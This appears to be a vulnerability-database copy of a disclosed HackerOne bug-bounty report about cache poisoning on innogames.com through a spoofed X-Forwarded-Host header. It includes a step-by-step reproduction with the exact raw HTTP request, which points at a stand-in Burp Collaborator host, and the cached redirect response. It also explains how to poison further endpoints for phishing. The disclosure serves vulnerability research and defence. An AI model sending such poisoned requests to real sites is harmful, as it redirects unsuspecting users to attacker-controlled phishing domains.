Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneMaceH1:960618
HistoryAug 17, 2020 - 2:12 p.m.

InnoGames: Cache Poisoning via uppercase letters in invalid path

2020-08-1714:12:52
mace
hackerone.com
$550
181
JSON

Summary of the issue

Cache poisoning vulnerability appears in the request to innogames.com. The issue arises when language path parameter from the url gets processed on the backend to become lowercase. Then if a path provided in X-Forwarded-Host does not exist on the server, 301 response is triggered with a redirect. The url provided in X-Forwarded-Host header gets cached and every user accessing this path will be redirected to it.

Vulnerable endpoint

https://innogames.com/DE/?variable=value

Steps to reproduce

  • Run Burp and navigate to the repeater tab to create a new request to the vulnerable endpoint:

>Host: www.innogames.com
>Port: 443
>Check: Use HTTPS

Request body:

GET /DE/?mace=triage HTTP/1.1
Host: www.innogames.com
Accept-Language: en,en-US;q=0.7,en;q=0.3
X-Forwarded-Host: not-evil.burpcollaborator.net
  • Hit send. Location header now has the value from the β€œX-Forwarded-Host” header that we modified

Response:

HTTP/1.1 301 Moved Permanently
Location: https://not-evil.burpcollaborator.net/de/?mace=triage
Content-Type: text/html; charset=UTF-8
X-Served-By: cache-fra19153-FRA, cache-ams21024-AMS
X-Cache: MISS, MISS
X-Cache-Hits: 0, 0
X-Timer: S1597672892.323454,VS0,VE16
Vary: Accept-Language,X-UA-Device
[...]
  • Now every user who hits this endpoint will be redirected to https://not-evil.burpcollaborator.net/de/?mace=triage
  • Many poisoned endpoints can be created by modifying the path from /DE/?mace=triage to /DE/?test=somethinghere and the value of the X-Forwarded-Host header

#Impact statement
This could be used for the phishing attacks. An attacker can set up a Domain which looks similar to innogames.com and spread this poisoned link via facebook or other forums, fooling users to follow it and get redirected to the evil attackers domain. However, one of the requirements for the exploitability is that an attacker has to be on a location near (from a network view) the target user. Otherwise his poisoned request will not hit the same fastly server as the users request.

#References
Security advisories from fastly

JSON